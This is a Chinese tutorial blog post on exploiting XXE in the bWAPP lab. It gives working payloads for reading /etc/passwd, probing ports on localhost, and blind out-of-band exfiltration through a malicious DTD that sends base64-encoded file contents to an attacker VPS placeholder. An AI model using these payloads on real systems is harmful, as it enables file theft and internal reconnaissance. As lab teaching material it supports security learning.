xxe漏洞利用

xxe

phpstudy 版本为5.4.45,高版本可以会报错

有回显xxe

点击any bugs,使用burp抓包
在这里插入图片描述

burp抓到的数据包如下(响应报错原因为php版本过高)
在这里插入图片描述

文件读取

修改xml内容,调用实体test,读取本地passwd文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "file:///g://etc/passwd">
]>
<reset><login>&test;</login><secret>Any bugs?</secret></reset>

在这里插入图片描述

读取服务器文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "http://127.0.0.1/bWAPP_latest/etc/passwd">
]>
<reset><login>&test;</login><secret>Any bugs?</secret></reset>

在这里插入图片描述

端口探测
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "http://127.0.0.1:80">
]>
<reset><login>&test;</login><secret>Any bugs?</secret></reset>

端口开放,会显示内容,或抛出警告如下

在这里插入图片描述
在这里插入图片描述

端口不开放则显示failed to load external
在这里插入图片描述

无回显xxe

1判断是否存在xxe漏洞

访问DNSlog,测试xxe漏洞是否存在

在这里插入图片描述

在这里插入图片描述

2 数据外带

外带到vps中

vps中的dtd文件

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://VPS的地址:2121/%file;'>">
%all;

在这里插入图片描述

使用python3模块搭建http服务

python3 -m http.server 2121

在这里插入图片描述

burp提交数据

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://VPS的http服务/xml.dtd">  
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///g://etc/passwd">
    %remote;
    %send;
]>

在这里插入图片描述

成功外带数据

在这里插入图片描述

将外带数据解码

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值